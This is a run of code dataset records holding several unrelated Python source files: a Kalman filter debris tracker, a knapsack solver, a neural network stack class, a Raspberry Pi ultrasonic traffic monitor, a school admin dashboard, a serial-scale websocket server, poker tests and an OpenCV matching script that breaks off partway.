guess*\nv_0 = np.array(debris_vel[0]) # Initial guess of relative velocity of debris, can be based on how fast plan to approach during rendezvous\nomega_0 = np.array(omega_L) # Initial guess of angular velocities - *need to formulate guess*\n# For the initializations, imagine a bounding box bottom right = p1, bottom left = p2, TP = p3, TR = p4, p5, p6, p7, p8 are\n# the same but in the back, centered at p0\np1_0 = p_0 + np.array([L_0/2, -D_0/2, -H_0/2])\np2_0 = p_0 + np.array([-L_0/2, -D_0/2, -H_0/2])\np3_0 = p_0 + np.array([-L_0/2, -D_0/2, H_0/2])\np4_0 = p_0 + np.array([L_0/2, -D_0/2, H_0/2])\np5_0 = p_0 + np.array([L_0/2, D_0/2, -H_0/2])\np6_0 = p_0 + np.array([-L_0/2, D_0/2, -H_0/2])\np7_0 = p_0 + np.array([-L_0/2, D_0/2, H_0/2])\np8_0 = p_0 + np.array([L_0/2, D_0/2, H_0/2])\nx_0 = np.array([p_0, v_0, omega_0, p1_0, p2_0, p3_0, p4_0, p5_0, p6_0, p7_0, p8_0]).ravel() # Initial State vector\nP_0 = np.diag([5., 5., 5., 1., 1., 1., 0.9, 0.9, 0.9, 2.1, 2.1, 2.1, 2.2, 2.2, 2.2, 2.3, 2.3, 2.3, 2.4, 2.4, 2.4,\n 2.5, 2.5, 2.5, 2.6, 2.6, 2.6, 2.7, 2.7, 2.7, 2.8, 2.8, 2.8]) # Initial Covariance matrix\n# Process noise covariance matrix\nQ = np.diag([5., 5., 5., 1., 1., 1., 0.9, 0.9, 0.9, 2.1, 2.1, 2.1, 2.2, 2.2, 2.2, 2.3, 2.3, 2.3, 2.4, 2.4, 2.4,\n 2.5, 2.5, 2.5, 2.6, 2.6, 2.6, 2.7, 2.7, 2.7, 2.8, 2.8, 2.8])\n# Measurement noise covariance matrix\nR = np.diag([5., 5., 5., 1., 1., 1., 0.9, 0.9, 0.9, 2.1, 2.1, 2.1, 2.2, 2.2, 2.2, 2.3, 2.3, 2.3, 2.4, 2.4, 2.4,\n 2.5, 2.5, 2.5, 2.6, 2.6, 2.6, 2.7, 2.7, 2.7, 2.8, 2.8, 2.8])\n\n# Current states\nx_k = x_0.copy() # State vector\nP_k = P_0.copy() # covariance matrix\n\n# Get Final measurement vectors\nz_p_s = [list(p_0)]\nz_s = []\nx_s = [x_0]\nP_s = [P_0]\n\n# convert points and LOS velocities to {L}\nfor i in range(nframes):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.legend()\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n\n # Decompose the state vector\n p_k = x_k[:3]\n v_k = x_k[3:6]\n omega_k = x_k[6:9]\n p1_k = x_k[9:12]\n p2_k = x_k[12:15]\n p3_k = x_k[15:18]\n p4_k = x_k[18:21]\n p5_k = x_k[21:24]\n p6_k = x_k[24:27]\n p7_k = x_k[27:30]\n p8_k = x_k[30:33]\n\n ##############\n # Update state\n ##############\n\n # Centroid from vertices\n c_k = (p1_k + p2_k + p3_k + p4_k + p5_k + p6_k + p7_k + p8_k) / 8.\n\n # Position update\n p_kp1 = v_k * dt + (p_k + c_k) / 2\n\n # Velocity update\n v_kp1 = v_k.copy()\n\n # Angular velocity update\n omega_kp1 = omega_k.copy()\n\n # Vertice updates\n p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, R_k_kp1 = verticeupdate(dt, x_k)\n\n # Final box\n #drawrectangle(ax, p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, 'g')\n\n # Compute Jacobian\n F_kp1 = F_matrix(dt, R_k_kp1, p_k, p1_k, p2_k, p3_k, p4_k, p5_k, p6_k, p7_k, p8_k)\n\n # Update Covariance\n P_kp1 = np.matmul(F_kp1, np.matmul(P_k, F_kp1.T)) + Q\n\n # Make updated State vector\n x_kp1 = np.array([p_kp1, v_kp1, omega_kp1, p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1]).ravel()\n\n # Calculate the Kalman gain\n K_kp1 = np.matmul(P_kp1, np.linalg.inv(P_kp1 + R))\n\n #######################\n # Make measurements\n #######################\n\n PLs.append((Rot_L_to_B[i].T @ (PBs[i]).T).T)\n # find bounding box from points\n XLs.append(PLs[i][:, 0])\n YLs.append(PLs[i][:, 1])\n ZLs.append(PLs[i][:, 2])\n X_i = XLs[i]\n Y_i = YLs[i]\n Z_i = ZLs[i]\n\n # Return bounding box and centroid estimate of bounding box\n z_pi_k, z_p_k = boundingbox.bbox3d(X_i, Y_i, Z_i, ax)\n\n ax.scatter(debris_pos[:, 0], debris_pos[:, 1], debris_pos[:, 2], color='g')\n\n drawrectangle(ax, z_pi_k[:,0], z_pi_k[:,1], z_pi_k[:,2], z_pi_k[:,3], z_pi_k[:,4], z_pi_k[:,5], z_pi_k[:,6], z_pi_k[:,7], 'b')\n\n # Vertice association\n pi_pk1 = [p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1]\n z_p1_k, z_p2_k, z_p3_k, z_p4_k, z_p5_k, z_p6_k, z_p7_k, z_p8_k = nearest_search(pi_pk1, z_pi_k, z_p_k)\n\n drawrectangle(ax, p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, 'g')\n drawrectangle(ax, z_p1_k, z_p2_k, z_p3_k, z_p4_k, z_p5_k, z_p6_k, z_p7_k, z_p8_k, 'r')\n\n # Estimate linear velocity\n # z_v_k = (np.array(z_p_k) - np.array(z_p_s[i-1]))/dt\n print(VBs[i])\n print(np.mean(VBs[i]))\n z_v_k = debris_vel[i]\n print(z_v_k)\n\n # find angular velocity from LOS velocities\n c = debris_pos[i]\n v_c = debris_vel[i]\n #z_omega_k = estimate(X_i, Y_i, Z_i, p_k, v_k, VBs[i])\n z_omega_k = estimate(X_i, Y_i, Z_i, c, v_c, VBs[i])\n\n # Get Measurement Vector\n z_kp1 = np.array(\n [z_p_k, z_v_k, z_omega_k, z_p1_k, z_p2_k, z_p3_k, z_p4_k, z_p5_k, z_p6_k, z_p7_k, z_p8_k]).ravel()\n\n ####################\n\n # Calculate Residual\n res_kp1 = z_kp1 - x_kp1\n\n # Update State\n x_kp1 = x_kp1 + np.matmul(K_kp1, res_kp1)\n\n # Update Covariance\n P_kp1 = np.matmul(np.eye(len(K_kp1)) - K_kp1, P_kp1)\n\n # Transfer states and covariance from kp1 to k\n P_k = P_kp1.copy()\n x_k = x_kp1.copy()\n\n ax.scatter(x_k[0], x_k[1], x_k[2], 'r' )\n\n # Append for analysis\n z_p_s.append(z_p_k)\n P_s.append(P_k)\n x_s.append(x_k)\n z_s.append(z_kp1)\n\n\n\n\n#plt.show()\n\n\n\n","repo_name":"Petrelli27/4D-LiDAR","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":14520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44373917953","text":"class Solution:\r\n def knapsack(self, A, B, C, n):\r\n if (n == 0) or (C == 0):\r\n return 0\r\n if A[n-1] > C:\r\n return self.knapsack(A, B, C, n - 1)\r\n\r\n inc = B[n - 1] + self.knapsack(A, B, C - A[n - 1], n - 1)\r\n\r\n exc = self.knapsack(A, B, C, n - 1)\r\n\r\n return max(inc, exc)\r\n\r\n def solve(self, A, B, C):\r\n n = len(A)\r\n return self.knapsack(A, B, C, n)\r\n\r\nB = [10, 20, 30]\r\nA = [60, 100, 120]\r\n\r\nC = 50\r\n\r\nobj = Solution()\r\nprint(obj.solve(B,A,C))","repo_name":"nikhil28cs52/codingchallange","sub_path":"0_1_knapsack.py","file_name":"0_1_knapsack.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8024445644","text":"\"\"\"\nYADAYADA is a simple toolbox for training neural networks with many hidden layers.\nIt allows to build these deep networks by successivly pretraining these layers in\norder to help training the complete deep network. Therefore, the central data structure\nis the Stack, a list of layers.\nTwo aspects are at the center of YADAYADA: (i) It must allow pretraining the single\nlayers and (ii) it must allow the usage of general optimization algorithms. To facilitate\nthis, the Stack is managing the complete parameter vector of the deep network. The\nvarious layers only have views into this vector -- they have their own parameters when\nin pretraining mode. It only uses its view on the global parameter vector when updating\nthis global parameter after a finished pretraining session. This explains why every single layer gets always the parameters\npassed in when doing forward or backward computations over the full stack.\n\"\"\"\n\n\nimport numpy as np\nfrom itertools import izip\nimport h5py\nfrom time import strftime\n\n\nfrom gnumpy import zeros as gzeros\nimport gnumpy as gpu\n\nfrom losses import loss_table\nfrom utils import prepare_opt, replace_gnumpy_data\nimport chopmunk as munk\n\n\nclass Stack(list):\n def __init__(self, ind, schedule):\n gpu.seed_rand(seed=None)\n self.logging = schedule[\"logging\"]\n self.psize = 0\n cuts = [0]\n self.stack = schedule[\"stack\"]\n for layer in self.stack:\n ltype = layer[\"type\"]\n units = layer[\"units\"]\n l = ltype.__new__(ltype)\n l.__init__(shape=(ind, units), **layer)\n self.psize += l.size\n self.append(l)\n cuts.append(l.size)\n ind = units\n self.params = gzeros(self.psize)\n self.cuts = np.cumsum(cuts)\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n layer.p = self.params[c1:c2]\n if \"score\" in schedule:\n self._score = schedule[\"score\"]\n else:\n print(\"You may have a problem: _score_ is NONE\")\n self._score = None\n\n def __repr__(self):\n rep = \"|\".join([str(l) for l in self])\n return rep\n\n def pretrain(self, schedule):\n train = [schedule[\"train\"][0], schedule[\"train\"][1]]\n valid = None if not schedule.get(\"valid\") else [schedule[\"valid\"][0], schedule[\"valid\"][1]]\n\n assert (valid is not None) == (\"valid\" in schedule[\"eval\"]), \"Confusion about validation set!\"\n\n for i, (layer, sched) in enumerate(izip(self, self.stack)):\n pt_params = layer.pt_init(**sched)\n \n opt_schedule = sched[\"opt\"]\n \n pp = {\"layer\":i, \"type\":str(layer)}\n munk.taggify(self.logging, \"pretty\").send(pp)\n log = munk.add_keyvalue(self.logging, \"layer\", i)\n \n epochs = opt_schedule[\"epochs\"]\n if epochs > 0:\n opt_schedule[\"f\"] = layer.pt_score\n opt_schedule[\"fprime\"] = layer.pt_grad\n\n opt, evals, peeks = prepare_opt(opt_schedule, pt_params, schedule, train, valid)\n\n stop = opt_schedule[\"stop\"]\n for j, info in enumerate(opt):\n if (j+1) % stop == 0:\n for e in evals:\n info[e] = evals[e](pt_params)\n info = replace_gnumpy_data(info)\n log.send(info)\n \n if (j+1) == epochs:\n break\n else:\n pp = {\"msg\": \"NO PRETRAINING of layer %i\"%i}\n munk.taggify(self.logging, \"pretty\").send(pp)\n\n info = layer.pt_done(pt_params, **sched)\n pt_params = None\n log.send(info)\n\n # move data forward, save in temporary hdf5\n if i < (len(self) - 1):\n nxt_name = strftime(\"%Y-%m-%d-%H:%M:%S\") + \"_L\" + str(i+1) + \"_TMP.h5\"\n nxt = h5py.File(nxt_name)\n pp = {\"msg\": \"Take care of temporary \" + nxt_name}\n munk.taggify(self.logging, \"pretty\").send(pp)\n # if a validation set is available, move it forward, too.\n if valid:\n valid[0] = self.next_hdf5(layer, valid[0], \"validation\", nxt, chunk=512)\n train[0] = self.next_hdf5(layer, train[0], \"train\", nxt, chunk=512)\n\n def train(self, schedule):\n train = [schedule[\"train\"][0], schedule[\"train\"][1]]\n valid = None if not schedule.get(\"valid\") else [schedule[\"valid\"][0], schedule[\"valid\"][1]]\n\n assert (valid is not None) == (\"valid\" in schedule[\"eval\"]), \"Confusion about validation set!\"\n\n opt_schedule = schedule[\"opt\"]\n \n pp = {\"type\" : str(self)}\n munk.taggify(self.logging, \"pretty\").send(pp)\n log = munk.add_keyvalue(self.logging, \"layer\", \"Stack\")\n \n epochs = opt_schedule[\"epochs\"]\n if epochs > 0:\n opt_schedule[\"f\"] = self.score\n opt_schedule[\"fprime\"] = self.grad\n\n if \"eval_score\" in opt_schedule:\n self._eval_score = opt_schedule[\"eval_score\"]\n opt_schedule[\"eval_score\"] = self.evaluate_score\n\n opt, evals, peeks = prepare_opt(opt_schedule, self.params, schedule, train, valid)\n\n stop = opt_schedule[\"stop\"]\n if \"peeks\" in opt_schedule:\n peek_iv = opt_schedule[\"peek_intervall\"]\n peek_files = {}\n for p in opt_schedule[\"peeks\"]:\n peek_files[p] = p + \".peek\"\n else:\n peek_iv = epochs + 1\n\n for i, info in enumerate(opt):\n if (i+1) % stop == 0:\n for e in evals:\n info[e] = evals[e](self.params)\n info = replace_gnumpy_data(info)\n log.send(info)\n\n if i+1 == epochs:\n break\n \n if (i+1) % peek_iv == 0:\n for p in peeks:\n prediction, inputs = peeks[p](self.params)\n np.savez(peek_files[p], prediction, inputs)\n pp = {\"msg\": \"Writing peek file %s\"%peek_files[p]}\n munk.taggify(self.logging, \"pretty\").send(pp)\n\n else:\n pp = {\"msg\": \"NO FINETUNING of stack\"}\n munk.taggify(self.logging, \"pretty\").send(pp)\n\n _params = self.params.as_numpy_array().tolist()\n info = dict(params=_params, shape=self.__repr__())\n log.send(info)\n\n def score(self, params, inputs, targets, **kwargs):\n data = inputs\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n data = layer.fward(self.params[c1:c2], data)\n return self._score(data, targets, **kwargs)\n\n def grad(self, params, inputs, targets, **kwargs):\n data = inputs\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n data = layer.fprop(self.params[c1:c2], data)\n\n _, delta = self._score(data, targets, error=True)\n\n g = gzeros(self.psize)\n for layer, (c1, c2) in izip(self[::-1], izip(self.cuts[-2::-1], self.cuts[:0:-1])):\n delta = layer.bprop(params=params[c1:c2], grad=g[c1:c2], delta=delta)\n return g\n\n def evaluate_score(self, params, inputs, targets, **kwargs):\n data = inputs\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n data = layer.fward(self.params[c1:c2], data)\n return self._eval_score(data, targets, **kwargs)\n\n def next_hdf5(self, layer, data, dname, nxt, chunk):\n \"\"\"After pretraining one layer, move\n data to new temporary hdf5 store.\n \"\"\"\n n = data.shape[0]\n d = layer.shape[1]\n tmp = nxt.create_dataset(name=dname, shape=(n, d), dtype=data.dtype)\n for i in xrange(0, n, chunk):\n tmp[i:i+chunk] = layer._fward(data[i:i+chunk])\n return tmp\n\n def _fward(self, data):\n for layer in self:\n data = layer._fward(data)\n return loss_table[self._score](data, targets=None, predict=True)\n\n def _fward_layers(self, data, layers):\n \"\"\"\n Only pass _data_ through _layers_ many layers.\n No loss applied!.\n \"\"\"\n for layer in self[:layers]:\n data = layer._fward(data)\n return data\n\n def reload(self, depot, folder, tag):\n \"\"\"\n reload schedule and parameters from depot/folder/tag.params\n depot, abs path\n \"\"\"\n from utils import load_params\n from os.path import join\n from gnumpy import as_garray\n file_prefix = join(depot, folder, tag)\n params = load_params(file_prefix + \".params\")\n params_stack = params['Stack']['params']\n self.params = as_garray(params_stack)\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n layer.p = self.params[c1:c2]\n","repo_name":"osdf/gpustack","sub_path":"gpustack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"5650665902","text":"# Importing required libraries\nimport RPi.GPIO as GPIO\nimport time\n\n# defining state function\ndef state(us1t, us1e, us2t, us2e, us3t, us3e, us4t, us4e, us5t, us5e, us6t, us6e):\n '''\n Input Parameter: us1t - Ultrasonic Sensor 1 Trigger Pin Number\n us1e - Ultrasonic Sensor 1 Echo Pin Number\n us2t - Ultrasonic Sensor 2 Trigger Pin Number\n us2e - Ultrasonic Sensor 2 Echo Pin Number\n us3t - Ultrasonic Sensor 3 Trigger Pin Number\n us3e - Ultrasonic Sensor 3 Echo Pin Number\n us4t - Ultrasonic Sensor 4 Trigger Pin Number\n us4e - Ultrasonic Sensor 4 Echo Pin Number\n us5t - Ultrasonic Sensor 5 Trigger Pin Number\n us5e - Ultrasonic Sensor 5 Echo Pin Number\n us6t - Ultrasonic Sensor 6 Trigger Pin Number\n us6e - Ultrasonic Sensor 6 Echo Pin Number\n Return: return value from traffic check by calling it.\n Purpose: to check traffic density in different lanes.\n '''\n\n # defining distance function\n def distance(TRIGGER, ECHO):\n '''\n Input Parameter: Trigger - Trigger Pin Number\n Echo - Echo Pin Number\n Return: True or False\n Purpose: To calculate distance of object from ultrasonic sensor in\n centimeters and return True if object is within 10 cm else False\n '''\n # generating pulse serring Trigger to True for 10 microseconds\n GPIO.output(TRIGGER, True)\n time.sleep(0.00001)\n GPIO.output(TRIGGER, False)\n\n # set start time when echo is low\n while GPIO.input(ECHO) == 0:\n StartTime = time.time()\n\n # set stop time while echo is high\n while GPIO.input(ECHO) == 1:\n StopTime = time.time()\n\n # time taken by sound to reach back to sensor\n TimeElapsed = StopTime - StartTime\n\n # calculating object distance (speed of sound in air - 340 m/s)\n distance = (TimeElapsed * 34000) / 2\n\n # returning True if object is between 2 cm and 10 cm else False\n return True if distance <= 10 and distance >= 2 else False\n\n # definfing traffic check function\n def trafficCheck():\n '''\n Input Parameter: None\n Return: Stat - an array containing six value. Each value can be\n either True or False.\n Purpose: To check stopped traffic at the junction. If obstacle is\n dedected continuously for 30 distance calculation, there is considered\n to be a traffic jam.\n Note: Uses distance function\n '''\n # creating arrays for different ultrasonic sensors\n array1 = []\n array2 = []\n array3 = []\n array4 = []\n array5 = []\n array6 = []\n\n # taking data from each sensor for 15 times\n for i in range(15):\n # taking data from ultrasonic sensor 2\n dist2 = distance(us2t, us2e) # obstacle detection\n array2.append(dist2) # append data to a list\n time.sleep(.170) # pause for 170 milliseconds\n\n # taking data from ultrasonic sensor 3\n dist3 = distance(us3t, us3e)\n array3.append(dist3)\n time.sleep(.170)\n \n # taking data from ultrasonic sensor 6\n dist6 = distance(us6t, us6e)\n array6.append(dist6)\n time.sleep(.170)\n\n # taking data from ultrasonic sensor 1\n dist1 = distance(us1t, us1e)\n array1.append(dist1)\n time.sleep(.170)\n\n # taking data from ultrasonic sensor 4\n dist4 = distance(us4t, us4e)\n array4.append(dist4)\n time.sleep(.170)\n\n # taking data from ultrasonic sensor 5\n dist5 = distance(us5t, us5e)\n array5.append(dist5)\n time.sleep(.170)\n\n # creating a list containing traffic state of different lanes\n # all() function takes iterable and returns True if all elements are True\n stat = [all(array1), all(array2), all(array3), all(array4), all(array5), all(array6)]\n return stat\n\n return trafficCheck()","repo_name":"psyphernix/Smart-Traffic-Management-System---time-sharing-based","sub_path":"ultrasonic.py","file_name":"ultrasonic.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"33201000262","text":"from Student import Student\nfrom Subject import Subject\nfrom Teacher import Teacher\nfrom User import User\n\n\nclass Administrator(User):\n def __init__(self):\n super().__init__()\n self.students = []\n self.teachers = []\n self.subjects = []\n\n def edit_data(self, obj, type):\n self.edit_dashboard()\n\n def time_tabling(self, schedule, rooms):\n pass\n\n def edit_dashboard(self):\n menu = \"\"\"\n EDIT DASHBOARD\n 1) Student\n 2) Teacher\n 3) Subject\n 4) Exit\n \"\"\"\n\n choice = None\n while choice != \"4\":\n choice = input(menu)\n if choice == \"1\":\n self.student_dashboard()\n elif choice == \"2\":\n self.teacher_dashboard()\n elif choice == \"3\":\n self.subject_dashboard()\n\n def student_dashboard(self):\n menu = \"\"\"\n STUDENT DASHBOARD\n 1) Add Student\n 2) Edit Student\n 3) Remove Student\n 4) Exit\n \"\"\"\n choice = None\n while choice != \"4\":\n choice = input(menu)\n if choice == \"1\":\n student = Student()\n student.register_student()\n self.students.append(student)\n print(\"Added student successfully\")\n elif choice == \"2\":\n uuid = input(\"Enter student unique id: \")\n for student in self.students:\n if uuid == str(student.get_uuid()):\n student.edit_student()\n elif choice == \"3\":\n uuid = input(\"Enter student unique id: \")\n for student in self.students:\n if uuid == str(student.get_uuid()):\n self.students.remove(student)\n\n def teacher_dashboard(self):\n menu = \"\"\"\n TEACHER DASHBOARD\n 1) Add Teacher\n 2) Edit Teacher\n 3) Remove Teacher\n 4) Exit\n \"\"\"\n choice = None\n while choice != \"4\":\n choice = input(menu)\n if choice == \"1\":\n teacher = Teacher()\n teacher.register_teacher()\n print(\"Added Teacher successfully\")\n elif choice == \"2\":\n uuid = input(\"Enter teacher unique id: \")\n for teacher in self.teachers:\n if uuid == str(teacher.get_uuid()):\n teacher.edit_teacher()\n elif choice == \"3\":\n uuid = input(\"Enter teacher unique id: \")\n for teacher in self.teachers:\n if uuid == str(teacher.get_uuid()):\n self.teachers.remove(teacher)\n\n def subject_dashboard(self):\n m = \"\"\"\n SUBJECT DASHBOARD\n 1)Add Subject\n 2)Edit Subject\n 3)Exit\n \"\"\"\n choice2 = None\n while choice2 != \"3\":\n choice2 = input(m)\n if choice2 == \"1\":\n subject1 = Subject(name=input(\"Enter Subject Name: \"), cost=input(\"Enter Subjects cost: \"),\n prerequisite_classes=input(\"Enter Subjects Prerequisite Classes: \"),\n min_grade=input(\"Enter Subjects minimum grade: \"))\n self.subjects.append(subject1)\n print(subject1.subject_id)\n elif choice2 == \"2\":\n self.edit_subject_dashboard(input(\"Enter Subject ID: \"))\n\n def edit_subject_dashboard(self, subject_id):\n for subject in self.subjects:\n if str(subject.subject_id) == subject_id:\n menu = \"\"\"\n SUBJECT EDIT DASHBOARD\n 1) Edit Subject Name\n 2) Edit Subject Cost\n 3) Edit Subject Prerequisite Classes\n 4) Edit Subject Minimum Grade\n 5) Edit Subject Meetings\n 6) Exit\n \"\"\"\n choice = None\n\n while choice != \"6\":\n choice = input(menu)\n if choice == \"1\":\n subject.edit_name(input(\"Enter new subject name: \"))\n elif choice == \"2\":\n subject.edit_cost(input(\"Enter new subject cost: \"))\n elif choice == \"3\":\n subject.edit_prereq(input(\"Enter new prerequisites: \"))\n elif choice == \"4\":\n subject.edit_min_grade(input(\"Enter new minimum grade for subject: \"))\n elif choice == \"5\":\n subject.meeting_dashboard()\n\n def register(self):\n super().register()\n\n\nadmin1 = Administrator()\nadmin1.edit_dashboard()\n","repo_name":"DhananjeyanN/School-App","sub_path":"Administrator.py","file_name":"Administrator.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18688568533","text":"\n#!/usr/bin/env python\n\n# WS server that sends messages at random intervals\n\nimport asyncio\nimport datetime\nimport random\nimport websockets\n\nimport serial\n\nasync def time(websocket, path):\n while True:\n data = await websocket.recv()\n print(data)\n ser = serial.Serial('/dev/ttyUSB0', 2400, timeout=1, parity=serial.PARITY_NONE)\n\n # jogando pó mágico\n values = bytearray([5,13])\n ser.write(values)\n \n peso = ser.readline()\n peso = peso[1:len(peso)-1]\n print('peso lido', peso) \n ser.close()\n await websocket.send(peso.decode())\n print('enviado: hello world')\n #now = datetime.datetime.utcnow().isoformat() + \"Z\"\n #await websocket.send(now)\n #await asyncio.sleep(random.random() * 3)\n\nstart_server = websockets.serve(time, \"127.0.0.1\", 5678)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n","repo_name":"geeksilva97/websocket-python","sub_path":"sockets_test.py","file_name":"sockets_test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5005431697","text":"\"\"\" Tests for the module chinese_poker. \"\"\"\n# pylint: disable=E0401\n\nimport pandas as pd\n\nimport bluff\nfrom bluff import chinese\n\n\nclass TestHand:\n \"\"\" Test class Hand. \"\"\"\n\n @staticmethod\n def _test_royalties(hand_class, test_csv_file):\n \"\"\" Test royalties counting. \"\"\"\n data = pd.read_csv(test_csv_file, index_col=None)\n for row in data.itertuples():\n hand = hand_class(row.hand)\n royalties = hand.royalties\n test_points = row.points\n assert royalties == test_points\n\n def test_top_royalties(self):\n \"\"\" Test top hand royalties. \"\"\"\n self._test_royalties(chinese.TopHand, \"test_top_royalties.csv\")\n\n def test_mid_royalties(self):\n \"\"\" Test middle hand royalties. \"\"\"\n self._test_royalties(chinese.MiddleHand, \"test_mid_royalties.csv\")\n\n def test_bottom_royalties(self):\n \"\"\" Test bottom hand royalties. \"\"\"\n self._test_royalties(chinese.BottomHand, \"test_bottom_royalties.csv\")\n\n\nclass TestPlayer:\n \"\"\" Test class player. \"\"\"\n\n @staticmethod\n def test_place_card_in_top_hand():\n \"\"\" Test placing a card in the top hand. \"\"\"\n player = chinese.Player(name=\"Chris Moneymaker\", points=2344)\n player.place_card(card=bluff.Card(\"As\"), hand=\"top\")\n assert len(player.top_hand) == 1\n\n @staticmethod\n def test_place_card_in_mid_hand():\n \"\"\" Test placing a card in the mid hand. \"\"\"\n player = chinese.Player(name=\"Sam Farha\", points=999)\n player.place_card(card=bluff.Card(\"As\"), hand=\"middle\")\n assert len(player.middle_hand) == 1\n\n @staticmethod\n def test_place_card_in_btm_hand():\n \"\"\" Test placing a card in the bottom hand. \"\"\"\n player = chinese.Player(name=\"Dan Harrington\", points=574)\n player.place_card(card=bluff.Card(\"As\"), hand=\"bottom\")\n assert len(player.bottom_hand) == 1\n\n\nclass TestGame:\n \"\"\" Test game dynamics.\"\"\"\n\n @staticmethod\n def _new_round():\n \"\"\" Start a new round. \"\"\"\n pkr = chinese.Poker(n_seats=2)\n chris = chinese.Player(name=\"Chris Moneymaker\", points=0)\n sam = chinese.Player(name=\"Sam Farha\", points=0)\n pkr.add_players(players=[chris, sam])\n return pkr.new_round()\n\n def test_round(self):\n \"\"\" Test initializing a new round. Check if number of cards is correct. \"\"\"\n rnd = self._new_round()\n player1 = rnd.players[0]\n assert len(player1.hand) == 13\n","repo_name":"matheusccouto/bluff","sub_path":"tests/test_chinese.py","file_name":"test_chinese.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"71118770017","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tkinter import filedialog\nfrom tkinter import Tk\n\n\ndef file_browse():\n \"\"\"\n Function to read in the files\n ----------------------------------------\n root.filename : Desired image file path\n \"\"\"\n\n root = Tk()\n root.withdraw()\n root.filename = filedialog.askopenfilename(parent=root, title=\"Select the Image\")\n\n return root.filename\n\n\ndef get_filteredimage(image, lower, upper):\n \"\"\"\n Function to calculate a mask which threshold the desired area\n ------------------------------------------------------------------\n image : Original Image\n\n lower : Lower threshold Limit\n\n upper : upper threshold limit\n ------------------------------------------------------------------\n rgb_filtered : Image after threshold\n \"\"\"\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n res, mask = cv2.threshold(gray, lower, upper, cv2.THRESH_BINARY)\n mask1 = cv2.inRange(image, (lower, lower, lower), (255, 255, 255))\n\n rgb_filtered = cv2.bitwise_and(image, image, mask=mask)\n\n return rgb_filtered\n\n\ndef plot_image(image, title=\"Plot\"):\n \"\"\"\n Function that plots the image\n -------------------------------------\n image : Image to be display\n\n title : title of the image\n \"\"\"\n\n # cv2.imshow(title, image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n plt.imshow(image)\n plt.show()\n\n\ndef template_matching(image, temp, threshold):\n \"\"\"\n Function tries matching the given template in the given image\n according to a threshold\n -------------------------------------------------------------\n image : Original image\n\n temp : Template Image\n\n threshold : The threshold at which the template is to be matched\n -------------------------------------------------------------\n _loc : Tuple of detected points\n \"\"\"\n\n filt_block_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n res = cv2.matchTemplate(filt_block_gray, temp, cv2.TM_CCOEFF_NORMED)\n _loc = np.where(res >= threshold)\n\n return _loc\n\n\ndef feature_matching(image, temp):\n \"\"\"\n Function tries to match the features of the given template and\n the given image to find the desired object\n -------------------------------------------------------------\n image : Original image\n\n temp : Template Image\n -------------------------------------------------------------\n _matches : Detected matches\n\n _kp1 : Image keypoints\n\n _kp2 : Template keypoints\n \"\"\"\n\n surf = cv2.xfeatures2d.SURF_create()\n\n kp1, des1 = surf.detectAndCompute(image, None)\n kp2, des2 = surf.detectAndCompute(temp, None)\n\n bf = cv2.BFMatcher(cv2.NORM_L1, crossCheck=False)\n _matches = bf.match(des1, des2)\n _matches = sorted(_matches, key=lambda x: x.distance)\n\n # img3 = cv2.drawMatches(image, kp1, temp, kp2, _matches[:10], None, flags=2)\n # plt.imshow(img3)\n # plt.show()\n\n return _matches[:7], kp1, kp2\n\n\ndef pixel_positions(key1, key2, _matches):\n \"\"\"\n Function extracts the spatial coordinates from the\n matched feature key points\n -----------------------------------------------------\n key1 : Keypoints for original image\n\n Key2 : Keypoints for template\n\n _matches : Matched feature points\n -----------------------------------------------------\n list_kp1 : Coordinates in original image\n\n list_kp2 : Coordinates in template\n\n matches : Matches for the refined coordinates\n \"\"\"\n\n list_kp1 = []\n list_kp2 = []\n list_mat = []\n\n # For each match...\n for mat in _matches:\n # Get the matching keypoints for each of the images\n img1_idx = mat.queryIdx\n img2_idx = mat.trainIdx\n\n # x - columns\n # y - rows\n # Get the coordinates\n (x1, y1) = key1[img1_idx].pt\n (x2, y2) = key2[img2_idx].pt\n\n # if (x2, y2) == (29.39104652404785, 26.495248794555664):\n list_kp1.append((x1, y1))\n list_kp2.append((x2, y2))\n list_mat.append(mat)\n\n return list_kp1, list_kp2, list_mat\n\n\ndef position_refinement(_loc, _kp1):\n \"\"\"\n Function further filters and refines the 